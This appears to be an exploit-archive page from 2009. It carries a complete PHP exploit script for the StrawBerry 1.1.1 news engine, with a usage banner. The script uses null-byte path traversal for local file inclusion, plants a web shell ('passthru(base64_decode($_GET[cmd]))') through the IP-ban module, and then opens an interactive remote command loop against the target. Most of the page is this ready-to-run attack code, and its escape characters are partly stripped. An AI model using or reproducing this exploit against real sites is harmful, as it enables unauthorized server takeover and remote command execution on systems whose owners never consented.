[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : StrawBerry 1.1.1 LFI / Remote Command Execution Exploit
# Published : 2009-05-14
# Author : [AVT]
# Previous Title : beLive v.0.2.3 (arch.php arch) Local File Inclusion Vulnerability
# Next Title : MRCGIGUY ClickBank Directory 1.0.1 Insecure Cookie Handling Vuln


<?php

/*********************************************************************
 * StrawBerry 1.1.1 LFI / Remote Command Execution Exploit           *
 * Site: http://strawberry.goodgirl.ru/                              *
 *********************************************************************
 * magic_quotes_gpc = Off                                            *
 *********************************************************************
 * Author: [AVT]                                                     *
 * Date : 10.05.09                                                   *
 * My Site: http://antichat.ru/                                      *
 *********************************************************************/
set_time_limit(0);
error_reporting(0);
list($cli,$host,$path) = $argv;

if ($argc != 3) {  
    
    print "no-------------------------------------------------------------on";
    print "r|   StrawBerry 1.1.1 LFI / Remote Command Execution Exploit   |n";
    print "r|           Site: http://strawberry.goodgirl.ru/              |n";
    print "ro-------------------------------------------------------------on";
    print "r| Author: [AVT]                                               |n";
    print "r| My Site: http://antichat.ru/                                |n";
    print "ro-------------------------------------------------------------on";
    print "r| Usage:   php expl.php [host] [path]                         |n";
    print "r| host     localhost                                          |n";
    print "r| path     /news/                                             |n";
    print "r| Example: php expl.php site.com /news/                       |n";
    print "ro-------------------------------------------------------------on";
    exit;      
}         
if (check_host ())
	{
	post_shell();
	}
use_shell();

function check_host ()
	{
	global $host,$path;
	$data = "GET {$path}example/index.php?do=../../../../db/base/ipban.MYD%00 HTTP/1.1rn";
	$data .= "Host: $hostrn";
	$data .= "Connection: closernrn";
	$html = send ($host,$data);
    	if (!stristr($html,'a:')) 
		{
		print "ro-------------------------------------------------------------on";
		print "r| Exploit Failed!                                             |n";
		print "ro-------------------------------------------------------------on";
		exit;
    		}
	elseif (stristr($html,'<code>'))
		{
		return false;
    		}
	else
		{
		return true;
		}
	}


function send ($host,$data) 
	{
	if (!$sock = @fsockopen($host,80)) 
		{
		die("Connection refused, try again!n");
    		}   	
	fputs($sock,$data);
	while (!feof($sock)) { $html .= fgets($sock); }
	fclose($sock);
	return $html;
	}

function post_shell() 
	{
	global $host,$path;
	$post  = "add_ip=" . urlencode('<code><?php passthru(base64_decode($_GET[cmd]));?></code>') . "&action=add&mod=ipban";
	$data .= "POST {$path}example/index.php?do=../../../../../inc/mod/ipban.mdu%00 HTTP/1.1rn";
	$data .= "Host: $hostrn";
	$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
	$data .= "Content-Type: application/x-www-form-urlencodedrn";
	$data .= "Content-Length: ".strlen($post)."rnrn";
	$data .= "$postrnrn";
	send ($host,$data);
	}


function use_shell()
	{
    	while (1) 
		{
        	echo "[Shell]~$: "; 
        	$cmd = stripslashes(trim(fgets(STDIN)));  
        	if (preg_match('/^(exit|--exit|quit|--quit)$/i',$cmd)) die("nExitedn");
        	print exec_cmd($cmd);     
		}
	}


function exec_cmd($cmd) 
	{
	global $host,$path;

	$cmd = base64_encode($cmd);
	$data .= "GET {$path}example/index.php?cmd={$cmd}&do=../../../../db/base/ipban.MYD%00 HTTP/1.1rn";
	$data .= "Host: $hostrn";
	$data .= "Connection: closernrn";
	$html = send ($host,$data);
	preg_match_all('/<code>(.*)</code>/si', $html, $match);
	return $match[1][0];
	}

?>

# www.Syue.com [2009-05-14]